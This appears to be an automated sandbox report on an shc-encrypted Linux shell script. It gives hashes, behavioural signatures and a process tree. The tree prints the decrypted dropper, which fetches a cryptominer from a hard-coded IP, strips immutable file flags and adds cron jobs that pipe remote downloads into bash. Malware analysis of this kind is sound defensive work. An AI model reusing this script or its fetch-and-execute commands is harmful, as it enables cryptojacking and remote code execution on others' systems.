Analysis
-
max time kernel
4s -
max time network
131s -
platform
ubuntu-24.04_amd64 -
resource
ubuntu2404-amd64-20240729-en -
resource tags
-
submitted
27-11-2024 05:48
General
-
Target
样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
-
Size
1023KB
-
MD5
069ad3938c3f9c049f670a8eb49dc1d8
-
SHA1
f4fd0c87a18d45ab4b642f32a94673c949ab7caf
-
SHA256
84d4b99f0d98900b4eadb7e107bf54196f2e5796d8707ebf0dcd76f5b6693295
-
SHA512
3c627883f53082face65b22d353c1926c4d4f4de008cf41cf2a3326762ad080dd95324f2fd35c3f60c069df4fb2c510d4fa07b26cbc404678f8a655c884beedb
-
SSDEEP
12288:SBgtRmLBGYhFcueTIqRe/w/Yt6myOP7/x7L15k7bKrHNq9EnE:SQRmLBTFcueTIie/wgB/x7LFLNq9
Score
7/10
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Attempts to change immutable files 4 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads CPU attributes 1 TTPs 2 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
Processes
-
/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D81⤵
-
/bin/bash/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8 -c "exec '/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8' \"\$@\"" /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D81⤵
-
/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D81⤵
-
/bin/bash/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8 -c " #!/bin/bash ifrunning=\$(pgrep xrx) ######################## ######################## downloadminer(){ link1=\"http://185.252.178.82:6972/xrx/xrx\" link2=\"http://185.252.178.82:6972/configs/config-xrx.json\" mkdir /var/tmp/.xrx cd /var/tmp/.xrx/ chattr -ia /var/tmp/.xrx/xrx chattr -ia /var/tmp/.xrx/config.json rm -rf /var/tmp/.xrx/xrx rm -rf /var/tmp/.xrx/config.json curl -L -O \$link1 || cd1 -L -O \$link1 || wget \$link1 --no-check-certificate curl -L -O \$link2 || cd1 -L -O \$link2 || wget \$link2 --no-check-certificate mv config-xrx.json config.json chmod +x /var/tmp/.xrx/xrx } ######################## ######################## crontablegend(){ if (( \$EUID != 0 )); then if ! crontab -l | grep -q 'secure'; then cd /dev/shm rm -rf /dev/shm/.spark echo \"@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> .spark sleep 1 echo \"@reboot /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> .spark sleep 1 echo \"1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> .spark sleep 1 echo \"*/30 * * * * curl 185.252.178.82:1011/next | bash \" >> .spark sleep 1 echo \"*/30 * * * * curl load.whitesnake.church:1011/next | bash \" >> .spark sleep 1 crontab .spark sleep 2 rm -rf /dev/shm/.spark fi fi if (( \$EUID == 0 )); then if ! cat /etc/crontab | grep -q 'secure'; then echo \"@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> /etc/crontab echo \"@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown \$* \" >> /etc/crontab echo \"1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> /etc/crontab echo \"*/30 * * * * root curl 185.252.178.82:1011/next | bash \" >> /etc/crontab echo \"*/30 * * * * root curl load.whitesnake.church:1011/next | bash \" >> /etc/crontab fi fi } ######################## ######################## gettingmineru(){ fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print \$5}'` if [ -f /var/tmp/.xrx/xrx ]; then echo \"miner intact\" else echo \"miner not found,downloading...\" downloadminer fi if [[ \"\$fsiz\" -gt 0 ]]; then echo \"miner size intact\" else echo \"filesize 0,downloading...\" downloadminer fi } ######################## ######################## gettingmineru crontablegend if test -z \"\$ifrunning\" ; then echo \"xrx not running,starting...\" /var/tmp/.xrx/xrx </dev/null &>/dev/null & disown -h %1 sleep 1 echo -e \"pid:\" pgrep xrx fi " /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D81⤵
- File and Directory Permissions Modification
- Creates/modifies Cron job
-
/usr/bin/pgreppgrep xrx2⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
-
/usr/bin/lsls -l /var/tmp/.xrx/xrx2⤵
-
-
/usr/bin/awkawk "{print \$5}"2⤵
-
-
/usr/bin/mkdirmkdir /var/tmp/.xrx2⤵
-
-
/usr/bin/chattrchattr -ia /var/tmp/.xrx/xrx2⤵
- Attempts to change immutable files
-
-
/usr/bin/chattrchattr -ia /var/tmp/.xrx/config.json2⤵
- Attempts to change immutable files
-
-
/usr/bin/rmrm -rf /var/tmp/.xrx/xrx2⤵
-
-
/usr/bin/rmrm -rf /var/tmp/.xrx/config.json2⤵
-
-
/usr/bin/curlcurl -L -O http://185.252.178.82:6972/xrx/xrx2⤵
-
-
/usr/bin/wgetwget http://185.252.178.82:6972/xrx/xrx --no-check-certificate2⤵
-
-
/usr/bin/curlcurl -L -O http://185.252.178.82:6972/configs/config-xrx.json2⤵
-
-
/usr/bin/wgetwget http://185.252.178.82:6972/configs/config-xrx.json --no-check-certificate2⤵
-
-
/usr/bin/mvmv config-xrx.json config.json2⤵
-
-
/usr/bin/chmodchmod +x /var/tmp/.xrx/xrx2⤵
- File and Directory Permissions Modification
-
-
/usr/bin/mkdirmkdir /var/tmp/.xrx2⤵
-
-
/usr/bin/chattrchattr -ia /var/tmp/.xrx/xrx2⤵
- Attempts to change immutable files
-
-
/usr/bin/chattrchattr -ia /var/tmp/.xrx/config.json2⤵
- Attempts to change immutable files
-
-
/usr/bin/rmrm -rf /var/tmp/.xrx/xrx2⤵
-
-
/usr/bin/rmrm -rf /var/tmp/.xrx/config.json2⤵
-
-
/usr/bin/curlcurl -L -O http://185.252.178.82:6972/xrx/xrx2⤵
-
-
/usr/bin/wgetwget http://185.252.178.82:6972/xrx/xrx --no-check-certificate2⤵
-
-
/usr/bin/curlcurl -L -O http://185.252.178.82:6972/configs/config-xrx.json2⤵
-
-
/usr/bin/wgetwget http://185.252.178.82:6972/configs/config-xrx.json --no-check-certificate2⤵
-
-
/usr/bin/mvmv config-xrx.json config.json2⤵
-
-
/usr/bin/chmodchmod +x /var/tmp/.xrx/xrx2⤵
- File and Directory Permissions Modification
-
-
/usr/bin/catcat /etc/crontab2⤵
-
-
/usr/bin/grepgrep -q secure2⤵
-
-
/var/tmp/.xrx/xrx/var/tmp/.xrx/xrx2⤵
-
-
/usr/bin/sleepsleep 12⤵
-
-
/usr/bin/pgreppgrep xrx2⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
-